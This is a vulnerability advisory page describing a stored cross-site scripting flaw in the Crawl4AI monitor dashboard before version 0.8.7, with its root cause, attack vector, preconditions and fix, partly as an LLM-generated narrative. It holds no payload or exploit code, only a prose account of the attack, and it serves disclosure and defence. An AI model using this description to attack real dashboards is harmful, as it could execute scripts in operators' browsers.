Crawl4AI - Stored Cross-Site Scripting in Monitor Dashboard
Description
Crawl4AI before 0.8.7 contains a stored cross-site scripting vulnerability in the monitor dashboard that renders crawl URLs and error messages via innerHTML without escaping. An attacker can submit a crafted crawl request with malicious markup that executes in an operator's browser when viewing the dashboard.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Affected products
1Patches
Vulnerability mechanics
Root cause
"The monitor dashboard uses innerHTML to render crawl URLs and error messages without escaping, allowing stored cross-site scripting."
Attack vector
An attacker submits a crafted crawl request containing malicious HTML/JavaScript markup in the URL or error fields. When an operator views the monitor dashboard, the unsanitized markup is rendered via `innerHTML`, causing the payload to execute in the operator's browser. This is a stored cross-site scripting (XSS) attack [CWE-79] [ref_id=1].
Affected code
The monitor dashboard in Crawl4AI renders crawl URLs and error messages via `innerHTML` without escaping. The advisory does not specify exact file paths, but the vulnerability resides in the dashboard component that displays submitted crawl requests.
What the fix does
The advisory indicates that version 0.8.7 is a security-hardening release that fixes critical vulnerabilities including XSS. The fix would involve escaping or sanitizing user-supplied values (URLs and error messages) before inserting them into the dashboard DOM, preventing script execution. No specific patch diff is provided in the bundle.
Preconditions
- networkThe attacker must be able to submit crawl requests to the Crawl4AI instance (e.g., via the API or web interface).
- authAn operator must view the monitor dashboard where the malicious crawl request is displayed.
Generated on Jun 24, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
2- github.com/unclecode/crawl4ai/security/advisories/GHSA-365w-hqf6-vxfgmitrevendor-advisory
- www.vulncheck.com/advisories/crawl4ai-stored-cross-site-scripting-in-monitor-dashboardmitrethird-party-advisory
News mentions
0No linked articles in our index yet.